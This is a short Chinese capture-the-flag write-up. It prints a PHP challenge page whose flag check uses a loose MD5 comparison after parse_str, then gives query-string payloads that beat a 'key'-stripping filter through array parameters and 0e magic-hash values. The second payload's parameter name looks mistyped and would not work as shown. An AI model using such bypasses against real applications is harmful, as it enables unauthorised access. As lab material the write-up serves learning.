先打开的网页有一串字符,仔细看是两个相同字符串,没有什么用
d41d8cd98f00b204e9800998ecf8427e
d41d8cd98f00b204e9800998ecf8427e
根据提示扫出备份网页文件
下载打开
parse_str 存储变量到一个数组中
<?php
/**
* Created by PhpStorm.
* User: Norse
* Date: 2017/8/6
* Time: 20:22
*/
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');//str为URL问号及问号以后的字符串
$str = substr($str,1); //去掉第一个字符 "?"
$str = str_replace('key','',$str); //将str中检索的key替换成空格
parse_str($str); //字符串解析为变量
echo md5($key1);
echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2)//MD5相等,而key1和key2不等
{
echo $flag."取得flag";
}
?>
弱比较使用数组绕过,构造
?kekeyy1[]=1&kekeyy2[]=2
?kekeyy1=240610708&kekey2=QNKCDZO
得到 flag